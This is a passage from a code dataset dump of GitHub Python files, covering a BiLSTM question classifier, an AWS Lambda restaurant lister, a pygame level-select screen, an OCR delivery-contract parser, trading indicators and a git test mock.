datasets.\ntext_field.build_vocab(train, valid, test)\nlabel_field.build_vocab(train, valid, test)\n#Train, Test and Validation Iterator\ntrain_iter, valid_iter, test_iter = data.BucketIterator.splits((train, valid, test),\n batch_sizes=(BATCH_SIZE, BATCH_SIZE, BATCH_SIZE), sort_key=lambda x: len(x.sentence), repeat=False)\n\nloss_function = nn.NLLLoss() #Loss Function\n\n# Loading FastText Vectors\nprint('Loading fasttext vectors.')\nembed_space = KeyedVectors.load_word2vec_format(vector_file, binary = False)\nprint('Finished loading fasttext vectors.')\n\nword_to_idx = 
 text_field.vocab.stoi #Syntactic sugar to get word indices from the vocabulary\npretrained_embeddings = np.random.uniform(-0.25, 0.25, (len(text_field.vocab), 300))\npretrained_embeddings[0] = 0\n\n# Populating the required embeddings\nfor key in tqdm(embed_space.vocab.keys()):\n    pretrained_embeddings[word_to_idx[key]-1] = embed_space[key]\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Using: \" + str(USE_GPU))\n\n\n
timestamp = str(int(time.time()))\nmodel = BiLSTM(embedding_dim=EMBEDDING_DIM, hidden_dim=HIDDEN_DIM, vocab_size=len(text_field.vocab), label_size=len(label_field.vocab)-1,\\\n               use_gpu=USE_GPU, batch_size=BATCH_SIZE)\nmodel.to(device)\nmodel.embeddings.weight.data.copy_(torch.from_numpy(pretrained_embeddings))\nmodel.embeddings.weight.requires_grad = False # Because we don't want to finetune the embedding weights; they are thus excluded from model.parameters()\nbest_model = model #Best model initially initialized to the current model\noptimizer = optim.Adam(model.parameters(), lr=1e-3) #Adam optimizer\nout_dir = os.path.abspath(os.path.join(os.path.curdir, \"runs\", timestamp))\n\n
#Calculating Accuracy\ndef get_accuracy(truth, pred):\n    assert len(truth) == len(pred)\n    right = 0\n    for i in range(len(truth)):\n        if truth[i] == pred[i]:\n            right += 1.0\n    return right/len(truth)\n\n
#For training the model\ndef train_epoch_progress(model, train_iter, loss_function, optimizer, text_field, label_field, epoch, device):\n    model.train()\n    avg_loss = 0.0\n    truth_res = []\n    pred_res = []\n    count = 0\n    for batch in tqdm(train_iter, desc='Train epoch '+str(epoch+1)):\n        sent, label = batch.sentence, batch.isQuestion\n        sent, label = sent.to(device), label.to(device)\n        label.data.sub_(1)\n        truth_res += list(label.data)\n        model.batch_size = len(label.data)\n        model.hidden = model.init_hidden()\n        pred = model(sent)\n        pred_cpu = pred.cpu()\n        pred_label = pred_cpu.data.max(1)[1].numpy()\n        pred_res += [x for x in pred_label]\n        model.zero_grad()\n        loss = loss_function(pred, label)\n        avg_loss += loss.item()\n        count += 1\n        loss.backward()\n        optimizer.step()\n    avg_loss /= len(train_iter)\n    acc = get_accuracy(truth_res, pred_res)\n    return avg_loss, acc\n\n
#For evaluating the model\ndef evaluate(model, data, loss_function, name, device):\n    model.eval()\n    avg_loss = 0.0\n    truth_res = []\n    pred_res = []\n    for batch in tqdm(data):\n        sent, label = batch.sentence, batch.isQuestion\n        sent, label = sent.to(device), label.to(device)\n        label.data.sub_(1)\n        truth_res += list(label.data)\n        model.batch_size = len(label.data)\n        model.hidden = model.init_hidden()\n        pred = model(sent)\n        pred_cpu = pred.cpu()\n        pred_label = pred_cpu.data.max(1)[1].numpy()\n        pred_res += [x for x in pred_label]\n        loss = loss_function(pred, label)\n        avg_loss += loss.item()\n    avg_loss /= len(data)\n    acc = get_accuracy(truth_res, pred_res)\n    print(name + ': loss %.2f acc %.1f' % (avg_loss, acc*100))\n    return acc\n\n
if not os.path.exists(out_dir):\n    os.makedirs(out_dir)\n\n
for epoch in range(EPOCHS):\n    avg_loss, acc = train_epoch_progress(model, train_iter, loss_function, optimizer, text_field, label_field, epoch, device)\n    tqdm.write('Train: loss %.2f acc %.1f' % (avg_loss, acc*100))\n    with torch.no_grad():\n        dev_acc = evaluate(model, valid_iter, loss_function, 'Dev', device)\n    if dev_acc > best_dev_acc:\n        if best_dev_acc > 0:\n            os.system('rm '+ out_dir + '/best_model' + '.pth')\n        best_dev_acc = dev_acc\n        best_model = model\n        torch.save(best_model.state_dict(), out_dir + '/best_model' + '.pth')\n        # evaluate on test with the 
best dev performance model\n test_acc = evaluate(best_model, test_iter, loss_function, 'Test', device)\n\ntest_acc = evaluate(model, test_iter, loss_function, 'Final Test', device)\nprint(\"Test Accuracy: \", test_acc)\n\n","repo_name":"pikishor/QuestionClassifier","sub_path":"QuestionClassifierModel.py","file_name":"QuestionClassifierModel.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33267677006","text":"import boto3\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\ndynamodb = boto3.resource('dynamodb')\ntable_name = 'table_reservation_app_restaurants' \ntable = dynamodb.Table(table_name)\n\ndef lambda_handler(event, context):\n try:\n # Scanning the DynamoDB table to fetch all restaurants\n logging.info(\"Scanning the DynamoDB table to fetch all restaurants\")\n response = table.scan()\n list_of_restaurants = response['Items']\n \n # Return the list of restaurants as a response\n return {\n 'statusCode': 200,\n 'body': list_of_restaurants\n }\n except Exception as e:\n # Return an error response if something goes wrong\n return {\n 'statusCode': 500,\n 'body': str(e)\n }\n","repo_name":"Sushank13/SDP1_Table_Reservation_App","sub_path":"lambdas/customer-app/list-restaurants/list_restaurants.py","file_name":"list_restaurants.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27787226938","text":"import pygame\nfrom gamedata import levels \nfrom os import path\nfrom support import import_folder\nfrom decoration import Sky\n\n\nclass Node(pygame.sprite.Sprite):\n #creates nodes for each level\n def __init__(self, pos, status, icon_speed, mypath):\n super().__init__()\n mypaths = path.join(*mypath)\n self.frames = import_folder(mypaths)\n self.frame_index = 0\n self.image = self.frames[self.frame_index] \n if status == 'available':\n self.status = 'available'\n else:\n self.status = 'locked'\n self.rect = self.image.get_rect(center = pos)\n #target rect needs to be h and w = to speed so that icon doesn't over shoot without triggering a collision\n self.detection_zone = pygame.Rect((self.rect.centerx - (icon_speed/2)), (self.rect.centery - (icon_speed/2)), icon_speed, icon_speed)\n \n def animate(self):\n self.frame_index += 0.15\n if self.frame_index >= len(self.frames):\n self.frame_index = 0\n self.image = self.frames[int(self.frame_index)]\n \n def update(self):\n if self.status== 'available':\n self.animate()\n else:\n tint_surface = self.image.copy()\n tint_surface.fill('black', None, pygame.BLEND_RGBA_MULT)\n self.image.blit(tint_surface, (0,0))\n \nclass Icon(pygame.sprite.Sprite):\n def __init__(self, pos):\n super().__init__()\n self.pos = pos\n self.image = pygame.image.load(path.join('graphics', 'overworld', 'hat.png')).convert_alpha()\n self.rect = self.image.get_rect(center = pos)\n \n def update(self):\n #adjusts rect of player icon position to account for int conversion when placing the level rectangle/icon on the screen\n self.rect.center = self.pos\n \nclass Overworld:\n def __init__(self, start_level, max_level, surface, create_level):\n super().__init__()\n #setup\n self.display_surface = surface\n self.max_level = max_level\n self.current_level = start_level\n self.create_level = create_level\n \n #movement logic\n self.moving = False\n self.move_direction = pygame.math.Vector2(0, 0)\n self.speed = 8\n \n #sprites\n self.setup_nodes()\n 
self.setup_icon()\n self.sky= Sky(8, 'overworld')\n \n #time \n self.start_time = pygame.time.get_ticks()\n self.allow_input = False\n self.timer_length = 300\n \n def setup_nodes(self):\n #creates level nodes and either locks or opens them based on current level completed\n self.nodes = pygame.sprite.Group()\n for index, node_data in enumerate(levels.values()):\n if index <= self.max_level:\n node_sprite = Node(node_data['node_pos'], 'available', self.speed, node_data['node_graphics']) \n else:\n node_sprite = Node(node_data['node_pos'], 'locked', self.speed, node_data['node_graphics'])\n self.nodes.add(node_sprite)\n \n def draw_paths(self):\n #make a list of points up to open level (below max level)\n points = []\n for index, node_data in enumerate(levels.values()):\n if index <= self.max_level:\n points.append(node_data['node_pos'])\n if len(points) > 1: \n pygame.draw.lines(self.display_surface, '#a04f45', False, points, 12)\n \n def setup_icon(self):\n #creates the player sprite\n self.icon = pygame.sprite.GroupSingle()\n icon_sprite = Icon(self.nodes.sprites()[self.current_level].rect.center)\n self.icon.add(icon_sprite)\n \n def input(self):\n #detects if key is being pressed and adjusts the current level accordingly\n keys = pygame.key.get_pressed()\n \n if not self.moving and self.allow_input:\n if keys[pygame.K_RIGHT] and self.current_level < self.max_level:\n self.move_direction = self.get_movement_data('next')\n self.current_level += 1\n self.moving = True\n\n elif keys[pygame.K_LEFT] and self.current_level > 0:\n self.move_direction = self.get_movement_data('last')\n self.current_level -= 1\n self.moving = True\n\n elif keys[pygame.K_SPACE]:\n self.create_level(self.current_level)\n \n def get_movement_data(self, target):\n #calculates the degree of the path between nodes\n start = pygame.math.Vector2(self.nodes.sprites()[self.current_level].rect.center)\n if target == 'next':\n end = pygame.math.Vector2(self.nodes.sprites()[self.current_level + 1].rect.center)\n else:\n end = pygame.math.Vector2(self.nodes.sprites()[self.current_level - 1].rect.center)\n \n return (end - start).normalize()\n \n def update_icon_pos(self):\n #moves icon from one level node to another after player presses key\n if self.moving and self.move_direction:\n self.icon.sprite.pos += self.move_direction * self.speed\n target_node = self.nodes.sprites()[self.current_level]\n if target_node.detection_zone.collidepoint(self.icon.sprite.pos):\n self.moving = False\n self.move_direction = pygame.math.Vector2(0, 0)\n\n def input_timer(self):\n #creates a pause/no input time after overworld created \n if not self.allow_input:\n current_time = pygame.time.get_ticks()\n if current_time >= self.start_time + self.timer_length:\n self.allow_input = True\n \n def run(self):\n self.input_timer()\n self.input()\n self.update_icon_pos()\n self.icon.update()\n self.nodes.update()\n self.sky.draw(self.display_surface)\n self.draw_paths()\n self.nodes.draw(self.display_surface)\n self.icon.draw(self.display_surface)\n","repo_name":"J-Currier/platformer","sub_path":"overworld.py","file_name":"overworld.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1778423933","text":"import re\nfrom PIL import Image\n\nfrom recognition import DeliveryOCR\nfrom graph import Region, Location, Package, DeliveryVerse\n\nSTART_WITH_ANY = \"\"\nGENERIC_TEMPLATES = {\n \"simple_contract\": {\n \"pickup_headers\": [\"PACKAGE FOR PICK UP\", 
\"PACKAGES FOR PICK UP \\(ANY ORDER\\)\"],\n \"pickup_package\": [\"Package \\#(?P.*) from (?P.*) on (?P.*)\"],\n \"dropoff_headers\": [\"DROP OFF LOCATION\", \"DROP OFF LOCATIONS \\(ANY ORDER\\)\"],\n \"dropoff_package\": [\"Package \\#(?P.*) to (?P.*) on (?P.*)\"]\n },\n \"one_to_n\": {\n \"pickup_headers\": [\"PACKAGE FOR PICK UP\", \"PACKAGES FOR PICK UP \\(ANY ORDER\\)\"],\n \"pickup_package\": [\"Collect all packages from (?P.*) on (?P.*)\"],\n \"dropoff_headers\": [\"DROP OFF LOCATION\", \"DROP OFF LOCATIONS \\(ANY ORDER\\)\"],\n \"dropoff_package\": [\"Package \\#(?P.*) to (?P.*) on (?P.*)\"]\n }\n}\nPER_COMPANY_TEMPLATES = {\n \"covalex\": {\n \"simple_contract\": {\n \"titles\": [\"Covalex Evaluation\", \"Covalex Local Delivery Route\"],\n \"pickup_headers\": GENERIC_TEMPLATES[\"simple_contract\"][\"pickup_headers\"],\n \"pickup_package\": GENERIC_TEMPLATES[\"simple_contract\"][\"pickup_package\"],\n \"dropoff_headers\": GENERIC_TEMPLATES[\"simple_contract\"][\"dropoff_headers\"],\n \"dropoff_package\": GENERIC_TEMPLATES[\"simple_contract\"][\"dropoff_package\"]\n },\n \"one_to_n\": {\n \"titles\": [\"Shipping Error - QT Sensitive Cargo\"],\n \"pickup_headers\": GENERIC_TEMPLATES[\"one_to_n\"][\"pickup_headers\"],\n \"pickup_package\": GENERIC_TEMPLATES[\"one_to_n\"][\"pickup_package\"],\n \"dropoff_headers\": GENERIC_TEMPLATES[\"one_to_n\"][\"dropoff_headers\"],\n \"dropoff_package\": GENERIC_TEMPLATES[\"one_to_n\"][\"dropoff_package\"]\n }\n }\n}\nCOMPANY_TO_PROPER_NAME = {\n \"covalex\": \"Covalex Shipping\"\n}\n\nGROUP_EXPRESSION = \"\\(\\?P\"\n\n\nclass LocationDetection:\n def __init__(self, name: str, region: str):\n self.name = name\n self.region = region\n\nclass PickupDetection:\n def __init__(self, name: str, location: LocationDetection):\n self.name = name\n self.location = location\n\nclass DropoffDetection:\n def __init__(self, name: str, location: LocationDetection):\n self.name = name\n self.location = location\n\nclass PackageDetection:\n def __init__(self, name: str, pickup_location: LocationDetection, dropoff_location: LocationDetection):\n self.name = name\n self.pickup_location = pickup_location\n self.dropoff_location = dropoff_location\n\nclass DeliveryDetections:\n def __init__(self, verse: DeliveryVerse, mission: int, company: str, contract: str):\n self.verse = verse\n self.mission = mission\n self.company = company\n self.contract = contract\n\n self.pickups = {}\n self.dropoffs = {}\n\n self.locations = {}\n self.packages = {}\n\n def add_detection(self, package: str, location: str, region: str, task: str):\n if task == \"pickup\":\n self.pickups[package] = PickupDetection(package, self.__try_add_location(location, region))\n elif task == \"dropoff\":\n if self.pickups.get(package, None):\n self.__add_dropoff_detection(package, location, region)\n elif len(self.pickups) > len(self.dropoffs):\n pickup_name = self.pickups[list(self.pickups.keys())[len(self.dropoffs)]].name\n self.__add_dropoff_detection(pickup_name, location, region)\n else:\n print(f\"[ERROR] Differing pickup ({len(self.pickups)}) and dropoff ({len(self.dropoffs) + 1}+) task counts, aborting\")\n exit()\n\n def confirm_detections(self):\n for location in self.locations.values():\n self.__apply_verse_location(location)\n for package in self.packages.values():\n self.__apply_verse_package(package)\n\n def __try_add_location(self, location: str, region: str):\n if not self.locations.get(location, None):\n self.locations[location] = LocationDetection(location, region)\n return 
self.locations[location]\n \n def __add_dropoff_detection(self, package: str, location: str, region: str):\n self.dropoffs[package] = DropoffDetection(package, self.__try_add_location(location, region))\n self.packages[package] = PackageDetection(package, self.pickups[package].location, self.dropoffs[package].location)\n\n def __apply_verse_location(self, location: LocationDetection):\n if not self.verse.regions.get(location.region, None):\n self.verse.regions[location.region] = Region(location.region)\n if not self.verse.locations.get(location.name, None):\n self.verse.locations[location.name] = Location(location.name, self.verse.regions[location.region])\n\n def __apply_verse_package(self, package: PackageDetection):\n self.verse.packages[package.name] = Package(self.mission, package.name, \n self.verse.locations[package.pickup_location.name], \n self.verse.locations[package.dropoff_location.name])\n\n\nclass DeliveryParser:\n def __init__(self, verse: DeliveryVerse):\n self.verse = verse\n self.detections = []\n\n def get_delivery_company_and_contract(self, title: str):\n for company, contracts in PER_COMPANY_TEMPLATES.items():\n for contract in contracts.keys():\n for template in contracts[contract][\"titles\"]:\n finds = re.findall(template, title)\n if len(finds) > 0:\n return company, contract\n print(f\"[WARN] No template matches title '{title}'\")\n\n def get_headers_index(self, detections: DeliveryDetections, task: str, lines: list, start_index=0):\n for index in range(start_index, len(lines)):\n for template in PER_COMPANY_TEMPLATES[detections.company][detections.contract][f\"{task}_headers\"]:\n finds = re.findall(template, lines[index])\n if len(finds) > 0:\n return index\n print(f\"[WARN] No line found containing {COMPANY_TO_PROPER_NAME[detections.company]} {task} headers\")\n return start_index\n\n def match_line_to_package_template(self, detections, task, line):\n for template in PER_COMPANY_TEMPLATES[detections.company][detections.contract][f\"{task}_package\"]:\n matches = re.match(f\".*{template}\", line)\n group_count = len(re.findall(GROUP_EXPRESSION, template))\n if matches and len(matches.groups()) == group_count:\n detections.add_detection(matches.group(\"name\"), matches.group(\"location\"), matches.group(\"region\"), task)\n return True, group_count\n return False, -1\n\n def get_packages_and_index(self, detections: DeliveryDetections, task: str, lines: list, start_index: int):\n matched = False\n for index in range(start_index, len(lines)):\n line_matched = False\n group_count = 0\n if lines[index] != \"\":\n line_matched, group_count = self.match_line_to_package_template(detections, task, lines[index])\n if line_matched:\n matched = True\n else:\n if lines[index] != \"\":\n print(f\"[WARN] Could not find all {group_count} field{'s' if group_count != 1 else ''} for {task} delivery '{lines[index]}', this will cause dragons\")\n if matched:\n return index\n if not matched:\n print(f\"[WARN] Could not find any packages for {task} task, this will cause dragons\")\n return start_index\n \n\n def detect_deliveries(self, mission: int, image: Image):\n ocr = DeliveryOCR(image)\n print(f\"[INFO] Processing image {mission + 1}\")\n\n company, contract = self.get_delivery_company_and_contract(ocr.texts[\"title\"])\n detections = DeliveryDetections(self.verse, mission, company, contract)\n self.detections.append(detections)\n lines = ocr.texts[\"text\"].split(\"\\n\")\n pickup_headers_index = self.get_headers_index(detections, \"pickup\", lines)\n last_pickup_index = 
self.get_packages_and_index(detections, \"pickup\", lines, pickup_headers_index + 1)\n dropoff_headers_index = self.get_headers_index(detections, \"dropoff\", lines, last_pickup_index + 1)\n self.get_packages_and_index(detections, \"dropoff\", lines, dropoff_headers_index + 1)","repo_name":"NotToDisturb/Express","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":8643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74508348846","text":"from jesse.helpers import get_candle_source, slice_candles\nimport numpy as np\nfrom numba import njit, jit\nimport talib \nfrom typing import Union\nfrom jesse.helpers import get_config\n\n\"\"\"\nhttps://www.tradingview.com/script/a7062wqw-Adaptive-Trend-Cipher-loxx/\n\"\"\"\n\ndef adaptive_length(candles: np.ndarray,b_corr:bool=False,smooth:int = 8,bp_period: int =13, bandwidth:float=0.20, LPPeriod: int = 20,hilbert_len:int=7, alpha : float = 0.07,adaptive_alg: str = \"band pass\", smoothing: bool = False, source_type: str = \"hl2\", sequential: bool = False) -> Union[float, np.ndarray]:\n candles1 = slice_candles(candles, sequential)\n source = get_candle_source(candles1, source_type=source_type)\n if adaptive_alg == \"icp\":\n f_ICP, smoothICP = func_icp(source,smooth)\n if smoothing == True:\n adaptive = smoothICP\n else:\n adaptive = f_ICP\n elif adaptive_alg == \"hilbert_dual\":\n hilbert_dual = func_hilbert_dual(source,LPPeriod)\n adaptive = hilbert_dual\n elif adaptive_alg == \"hilbert\":\n hilbert = func_hilbert(source,hilbert_len,alpha)\n adaptive = hilbert\n elif adaptive_alg == \"band pass\":\n bandpass = func_bandpass(source,bp_period,bandwidth)\n adaptive = bandpass\n else:\n print(\"value error\")\n # elif \n if b_corr:\n corr = correlation(source,candles,int(adaptive[-1]))\n else:\n corr = np.zeros(2)\n if sequential:\n return adaptive,corr\n else:\n return adaptive[-1],corr[-1]\n\n@njit\ndef func_icp(source,smooth):\n RADIANtoDEGREES = 90.0 / np.arcsin(1.0)\n SQRT2xPI = np.sqrt(2.0) * np.arcsin(1.0) * 2.0\n detrend = np.zeros(source.shape[0])\n inPhase = np.zeros(source.shape[0])\n quadrature = np.zeros(source.shape[0])\n divisor = np.zeros(source.shape[0])\n phase = np.zeros(source.shape[0])\n deltaPhase = np.zeros(source.shape[0])\n smoothICP = np.zeros(source.shape[0])\n f_ICP = np.zeros(source.shape[0])\n alpha = SQRT2xPI / smooth \n beta = np.exp(-alpha)\n gamma = -beta* beta\n delta = 2.0 * beta * np.cos(alpha)\n for i in range(81,source.shape[0]):\n detrend[i] = source[i] - source[i-7]\n inPhase[i] = 1.25 * (detrend[i-4] - 0.635 * detrend[i-2]) + 0.635 * inPhase[i-3]\n quadrature[i] = detrend[i-2] - 0.338 * detrend[i] + 0.338 * quadrature[i-2]\n divisor[i] = inPhase[i] + inPhase[i-1]\n phase[i] = RADIANtoDEGREES * np.arctan(np.abs((quadrature[i] + quadrature[i-1])/divisor[i])) if divisor[i] != 0.0 else 0.0\n if (inPhase[i] < 0.0 and quadrature[i] > 0.0):\n phase[i] = 180.0 - phase[i]\n if (inPhase[i] < 0.0 and quadrature[i] < 0.0):\n phase[i] = 180.0 + phase[i]\n if (inPhase[i] > 0.0 and quadrature[i] < 0.0):\n phase[i] = 360 - phase[i] \n deltaPhase[i] = phase[i-1] - phase[i] \n if (phase[i-1] < 90 and phase[i] > 270):\n deltaPhase[i] = 360 + phase[i-1] - phase[i] \n deltaPhase[i] = np.maximum(1.0, np.minimum(60.0,deltaPhase[i]))\n E = 0.0\n ICP = 0.0\n for j in range(81):\n E = E + deltaPhase[i-j]\n if (E > 360.0 and ICP == 0):\n ICP = (j)\n break \n f_ICP[i] = ICP\n if (f_ICP[i]==0):\n f_ICP[i] = f_ICP[i-1]\n smoothICP[i] = (1.0 - delta 
- gamma) * f_ICP[i] + delta * smoothICP[i-1] + gamma * smoothICP[i-2]\n        f_ICP[i] = np.maximum(6,f_ICP[i])\n        smoothICP[i] = np.maximum(6,smoothICP[i])\n    return f_ICP, np.floor(smoothICP)\n\n@njit(fastmath = True)\ndef func_hilbert_dual(source, LPPeriod): \n    max_len = 80\n    min_len = 6\n    alpha = (np.cos(0.707 * 2 * np.pi / max_len) + np.sin(0.707 * 2 * np.pi / max_len) - 1) / np.cos(0.707 * 2 * np.pi / max_len)\n    a1 = np.exp(-np.sqrt(2) * np.pi / LPPeriod)\n    b1 = 2 * a1 * np.cos(np.sqrt(2) * np.pi / LPPeriod)\n    c2 = b1 \n    c3 = -a1 * a1 \n    c1 = 1 - c2 - c3 \n    HP = np.zeros(source.shape[0])\n    Filt = np.zeros(source.shape[0])\n    IPeak = np.zeros(source.shape[0])\n    Real = np.zeros(source.shape[0])\n    Quad = np.zeros(source.shape[0])\n    QPeak = np.zeros(source.shape[0])\n    Imag = np.zeros(source.shape[0])\n    IDot = np.zeros(source.shape[0])\n    QDot = np.zeros(source.shape[0])\n    Period = np.zeros(source.shape[0])\n    DomCycle = np.zeros(source.shape[0])\n    for i in range(source.shape[0]):\n        HP[i] = (1 - alpha / 2) * (1 - alpha / 2) * (source[i] - 2 * source[i-1] + source[i-2]) + 2 * (1 - alpha) * HP[i-1] - (1 - alpha) * (1 - alpha) * HP[i-2]\n        Filt[i] = c1 * (HP[i] + HP[i-1]) / 2 + c2 * Filt[i-1] + c3 * Filt[i-2] \n        IPeak[i] = 0.991 * IPeak[i-1] \n        IPeak[i] = np.abs(Filt[i]) if np.abs(Filt[i]) > IPeak[i] else IPeak[i]\n        Real[i] = Filt[i] / IPeak[i] \n        Quad[i] = Real[i] - Real[i-1] \n        QPeak[i] = 0.991 * QPeak[i-1] \n        QPeak[i] = np.abs(Quad[i]) if np.abs(Quad[i]) > QPeak[i] else QPeak[i]\n        Imag[i] = Quad[i] / QPeak[i] \n        IDot[i] = Real[i] - Real[i-1] \n        QDot[i] = Imag[i] - Imag[i-1] \n        Period[i] = 2 * np.pi * (Real[i] * Real[i] + Imag[i] * Imag[i]) / (-Real[i] * QDot[i] + Imag[i] * IDot[i]) if Real[i] * QDot[i] - Imag[i] * IDot[i] != 0 else Period[i-1] \n        Period[i] = np.minimum(np.maximum(Period[i],min_len),max_len)\n        DomCycle[i] = c1 * (Period[i] + Period[i-1]) / 2 + c2 * DomCycle[i-1] + c3 * DomCycle[i-2] \n    return np.floor(DomCycle)\n\n#might not be accurate\n@njit(fastmath=True)\ndef correlation(x,candles,len1):\n    min_len = 6\n    max_len = 80\n    meanx = np.zeros(x.shape[0])\n    meany = np.zeros(x.shape[0]) \n    output = np.zeros(x.shape[0])\n    y = np.zeros(x.shape[0])\n    for i in range(len1,x.shape[0]):\n        y[i] = candles.shape[0] - i\n        meanx[i] = np.mean(x[i-(len1-1):i+1])\n        meany[i] = np.mean(y[i-(len1-1):i+1])\n        sumx = 0.0\n        sumy = 0.0\n        sumxy = 0.0\n        for j in range(max_len):\n            # Pearson numerator: sum of pairwise deviation products\n            sumxy = sumxy + (x[i-j] - meanx[i]) * (y[i-j] - meany[i])\n            sumx = sumx + np.power(x[i-j] - meanx[i],2)\n            sumy = sumy + np.power(y[i-j] - meany[i], 2)\n        output[i] = sumxy / np.sqrt(sumy * sumx)\n    return output\n\n#not accurate; np.percentile replaced with cheap alternative \n@njit(fastmath=True)\ndef func_hilbert(source,hilbert_len,alpha):\n    smooth = np.zeros(source.shape[0])\n    cycle = np.zeros(source.shape[0])\n    period = np.zeros(source.shape[0])\n    q1 = np.zeros(source.shape[0])\n    deltaPhase = np.zeros(source.shape[0])\n    medianDelta = np.zeros(source.shape[0])\n    dc = np.zeros(source.shape[0])\n    instPeriod = np.zeros(source.shape[0])\n    WMA = np.zeros(source.shape[0])\n    index = int(np.floor(hilbert_len/2))\n    for i in range(hilbert_len,source.shape[0]):\n        smooth[i] = (source[i] + 2 * source[i-1] + 2 * source[i-2] + source[i-3]) / 6 \n        cycle[i] = (1 - 0.5 * alpha) * (1 - 0.5 * alpha) * (smooth[i] - 2 * smooth[i-1] + smooth[i-2]) + 2 * (1 - alpha) * cycle[i-1] - (1 - alpha) * (1 - alpha) * cycle[i-2]\n        q1[i] = (0.0962 * cycle[i] + 0.5769 * cycle[i-2] - 0.5769 * cycle[i-4] - 0.0962 * cycle[i-6]) * (0.5 + 0.08 * instPeriod[i-1])\n        
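# The block below estimates the instantaneous cycle period. deltaPhase applies\n        # the tangent-difference identity tan(a-b) = (tan a - tan b) / (1 + tan a * tan b)\n        # to successive inphase/quadrature ratios cycle[i-3]/q1[i], clamping the result\n        # to [0.1, 1.1]; medianDelta takes the half-window lagged value as a cheap\n        # stand-in for a rolling median (see the note above this function), and the\n        # dominant cycle dc = 2*pi/medianDelta + 0.5 is then double-smoothed via EMAs.\n        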
deltaPhase[i] = (cycle[i-3] / q1[i] - cycle[i-4] / q1[i-1]) / (1 + cycle[i-3] * cycle[i-4] / (q1[i] * q1[i-1])) if q1[i] != 0 and q1[i-1] != 0 else 0 \n        deltaPhase[i] = np.minimum(np.maximum(deltaPhase[i],0.1),1.1)\n        medianDelta[i] = deltaPhase[i-index] #np.percentile(deltaPhase[i-(hilbert_len-1):i+1],50)\n        dc[i] = np.pi * 2 / medianDelta[i] + 0.5 if medianDelta[i] != 0 else 15\n        instPeriod[i] = 0.33 * dc[i] + 0.67 * (instPeriod[i-1])\n        period[i] = 0.15 * instPeriod[i] + 0.85 * period[i-1] \n        weight = 0.0\n        norm = 0.0 \n        sum1 = 0.0\n        for j in range(4):\n            weight = (4 - j)*4\n            norm = norm + weight \n            sum1 = sum1 + period[i-j] * weight \n        WMA[i] = np.floor(sum1/norm)\n    return np.floor(WMA) \n    \n#not accurate\n@njit(fastmath=True)\ndef func_bandpass(source,bp_period,bpw):\n    alpha2 = (np.cos(0.25*bpw*2*np.pi/bp_period) + np.sin(0.25 * bpw * 2 * np.pi / bp_period) - 1) / np.cos(0.25 * bpw * 2 * np.pi / bp_period)\n    beta1 = (np.cos(2*np.pi/bp_period))\n    gamma1 = 1 / np.cos(2 * np.pi * bpw / bp_period)\n    alpha1 = gamma1 - np.sqrt(gamma1 * gamma1 - 1)\n    HP = np.zeros(source.shape[0])\n    BP = np.zeros(source.shape[0])\n    Peak = np.zeros(source.shape[0])\n    Real = np.zeros(source.shape[0])\n    DC = np.zeros(source.shape[0])\n    counter = np.zeros(source.shape[0])\n    for i in range(bp_period,source.shape[0]):\n        HP[i] = (1 + alpha2 / 2) * (source[i] - source[i-1]) + (1 - alpha2) * HP[i-1]\n        BP[i] = 0.5 * (1 - alpha1) * (HP[i] - HP[i-2]) + beta1 * (1 + alpha1) * BP[i-1] - alpha1 * BP[i-2]\n        Peak[i] = 0.991 * Peak[i-1]\n        Peak[i] = np.abs(BP[i]) if np.abs(BP[i]) > Peak[i] else Peak[i] \n        Real[i] = BP[i] / Peak[i] if Peak[i] != 0 else Real[i-1]\n        DC[i] = 6 if DC[i-1] < 6 else DC[i-1] \n        counter[i] = counter[i-1] + 1 \n        if (Real[i] > 0 and Real[i-1] < 0) or (Real[i] < 0 and Real[i-1] > 0):\n            DC[i] = 2 * counter[i] \n            if 2 * counter[i] > 1.25 * DC[i-1]:\n                DC[i] = 1.25 * DC[i-1] \n            if 2 * counter[i] < 0.8 * DC[i-1]: \n                DC[i] = 0.8 * DC[i-1] \n            counter[i] = 0 \n    return np.floor(DC) ","repo_name":"DanielLiszka/Ported-Pinescript-Indicators-for-Jesse","sub_path":"ported_indicators/adaptive_lengths.py","file_name":"adaptive_lengths.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
{"seq_id":"4435826518","text":"from unittest import TestCase\n\nfrom gitaudit.git.change_log_entry import ChangeLogEntry\nfrom gitaudit.analysis.merge_diff.merge_diff import get_head_base_hier_logs\n\nMAIN_JSON_LOG = [\n    {\n        \"sha\": \"d\",\n        \"parent_shas\": [\"c\"],\n    },\n    {\n        \"sha\": \"c\",\n        \"parent_shas\": [\"b\"],\n    },\n    {\n        \"sha\": \"b\",\n        \"parent_shas\": [\"a\"],\n    },\n    {\n        \"sha\": \"a\",\n        \"parent_shas\": [],\n    },\n]\n\nRELEASE_JSON_LOG = [\n    {\n        \"sha\": \"f\",\n        \"parent_shas\": [\"e\"],\n    },\n    {\n        \"sha\": \"e\",\n        \"parent_shas\": [\"b\"],\n    },\n    {\n        \"sha\": \"b\",\n        \"parent_shas\": [\"a\"],\n    },\n    {\n        \"sha\": \"a\",\n        \"parent_shas\": [],\n    },\n]\n\n\nclass MockGit:\n    def __init__(\n        self,\n    ) -> None:\n        self.ref_logs = {}\n\n    def append_ref(self, name, json_log):\n        self.ref_logs[name] = json_log\n        self.ref_logs[json_log[0][\"sha\"]] = json_log\n\n    def log_parentlog(self, end_ref):\n        return list(\n            map(\n                lambda x: ChangeLogEntry.parse_obj(x),\n                self.ref_logs[end_ref],\n            )\n        )\n\n    def log_changelog(self, end_ref, start_ref=False, first_parent=False, patch=False):\n        return list(\n            map(\n                lambda x: ChangeLogEntry.parse_obj(x),\n                self.ref_logs[end_ref],\n            )\n        
